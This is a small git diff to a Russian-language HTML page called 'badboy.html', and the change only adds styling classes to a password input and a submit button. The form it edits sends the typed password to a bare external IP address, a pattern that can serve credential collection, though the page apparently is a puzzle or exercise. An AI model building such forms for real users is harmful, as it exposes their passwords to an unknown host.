--- a/badboy.html
+++ b/badboy.html
@@ -11,8 +11,8 @@
     <p class="text1">Введите пароль <br>
  </p>
     <form action="http://167.172.99.77:3000" method="post" id="myform">
-        <input type="password" id="login-pass" name="password">
-        <button type="submit" class="btn btn-default">А сейчас?</button>
+        <input class="input" type="password" id="login-pass" name="password">
+        <button class = 'button2' type="submit" class="btn btn-default">А сейчас?</button>
     </form>
 
 </div>
